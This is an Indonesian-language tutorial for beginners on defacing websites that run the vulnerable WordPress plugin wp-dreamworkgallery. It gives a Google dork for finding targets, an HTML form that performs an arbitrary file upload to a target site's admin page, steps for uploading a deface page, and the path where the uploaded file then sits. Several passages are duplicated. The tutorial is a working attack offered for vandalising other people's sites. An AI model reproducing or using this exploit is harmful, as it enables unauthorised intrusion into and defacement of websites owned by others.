 |
| Ciee...naksir nie ..^_^ |
Hallo semua๐๐
Kembali lagi dengan saya disini๐,kali ini saya akan membagikan sebuah tutorial yang sangat mudah seputar deface๐๐ disini kita akan membahas tutorial deface Metode dream Work Gallery.
tapi bagi yang sudah tau Gak usah lihat lagi yah:v ,soalnya Saya post tutor kali ini buat yang newbie saja, mastah minggat dulu yah๐๐.
ok Yang perlu kita siapin bahannya ada dibawah.
Bahan-Bahan :
-Pc / android
-akses internet
-script deface
Kembali lagi dengan saya disini๐,kali ini saya akan membagikan sebuah tutorial yang sangat mudah seputar deface๐๐ disini kita akan membahas tutorial deface Metode dream Work Gallery.
tapi bagi yang sudah tau Gak usah lihat lagi yah:v ,soalnya Saya post tutor kali ini buat yang newbie saja, mastah minggat dulu yah๐๐.
ok Yang perlu kita siapin bahannya ada dibawah.
Bahan-Bahan :
-Pc / android
-akses internet
-script deface
*Dork :
inurl:/wp-content/plugins/wp-dreamworkgallery/
inurl:/wp-content/plugins/wp-dreamworkgallery/
*Csrf :
<html>
<body>
<form action=" http://Sitetarget.com/wp-admin/admin.php?
page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload"/>
<input type="hidden" name="album_desc" value="Arbitrary File Upload"/>
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
<html>
<body>
<form action=" http://Sitetarget.com/wp-admin/admin.php?
page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload"/>
<input type="hidden" name="album_desc" value="Arbitrary File Upload"/>
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
NOTE:"Simpan csrfnya ber extension .html".
Langkah-Langkah :
1.yang pertama kita harus mencari target dengan melakukan dorking terlebih dahulu. kemudian pilih situs yang ingin kamu jadikan sebagai target.
2.masuk kesitus target yang sudah kamu pilih tersebut, maka tampilanya seperti gambar dibawah.
Kemudian copy saja Domain situs target kamu, Lalu edit csrf yang udah kamu copas tadi. kemudian pastekan Domainnya di sitetarget.com ,lalu save as menjadi .html
3.Buka csrf nya di browser /Google.klik pilih file untuk memilih script deface kamu, Kalo sudah memilih tinggal klik submit.
4.maka tampilanya akan kayak gambar dibawah ini.
 |
| -/4LF45T |
tinggal panggil script deface nya caranya copy teks seperti gambar diatas tersebut.
Akses deface nya:
contoh seperti ini :
contoh seperti ini :
/wp-content/uploads/dreamwork/3884_uploadfolder/big/c0l1.html
tinggal pastekan saja dibelakang situs target kamu๐๐.
5.Boouuumm.... Berhasilkan Get defaced๐๐๐.
 |
| -/4LF45T |
Sekian dari tutorial Kali ini. Sampai jumpa di tutorial selanjutnya yah Gan๐๐
Byee... ๐๐
Byee... ๐๐